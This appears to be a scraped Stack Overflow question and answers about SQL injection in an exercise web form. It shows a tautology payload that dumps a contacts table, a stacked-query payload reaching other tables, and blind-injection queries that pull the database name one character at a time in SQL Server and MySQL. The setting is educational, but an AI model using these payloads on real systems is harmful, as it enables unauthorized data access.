问题
I'm doing an exercise on the SQL Injection, the query is given. The data comes in between ''. So this is the query:
select * from contacts where name = ''
I managed to see the users in the table using this:
select * from contacts where name = 'anything' or 1='1'
But my question is how I can write it so that I can write a new query? Or see the database name for example so that I can check other tables.
EDIT:
To avoid confusion the query is not given to us, there is a textfield on a webpage, that's what we use to do SQL injection.
So imagine the query is being this:
select * from contacts where name = ''
And I wrote this to the text field, to see all the users.
anything' or 1='1
I'm trying to understand how I can use this textfield, to see the name of the database, or run other queries.
Thank you.
回答1:
So if the query is :
select * from contacts where name = ''
You can try something like:
'; select * from anotherTableName'
回答2:
If your data does not return multi-result sets then you can so something like:
In SQL Server
SELECT * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=1
SELECT * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=2
SELECT * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=3
...
Until you get all the correct indexes of the characters in the name.
In MySQL it would be something like:
SELECT * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =1
SELECT * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =2
SELECT * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =3
...
来源:https://stackoverflow.com/questions/47837400/sql-injection-mysql